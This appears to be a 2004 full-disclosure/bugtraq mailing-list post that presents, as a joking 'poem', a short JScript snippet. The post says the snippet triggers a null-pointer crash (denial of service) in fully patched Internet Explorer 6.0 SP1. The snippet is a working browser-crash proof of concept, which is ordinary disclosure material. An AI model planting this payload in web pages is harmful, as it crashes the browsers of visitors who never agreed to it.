[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
I small poem in JScript
- To: <full-disclosure@xxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: I small poem in JScript
- From: "Berend-Jan Wever" <skylined@xxxxxxxxxxxxxxx>
- Date: Sun, 11 Jul 2004 09:28:34 +0200
I just wrote a small poem in JScript:
<SCRIPT language="javascript">
MSIE = window.open; // for hackers to come in
for (every_bug_found in MSIE) { /* there are zillions more hiden */ }
</SCRIPT>
Ok, so it doen't rhyme... but it is another null-pointer exception DoS in MSIE
6.0sp1 (fully patched) ;)
Cheers,
SkyLined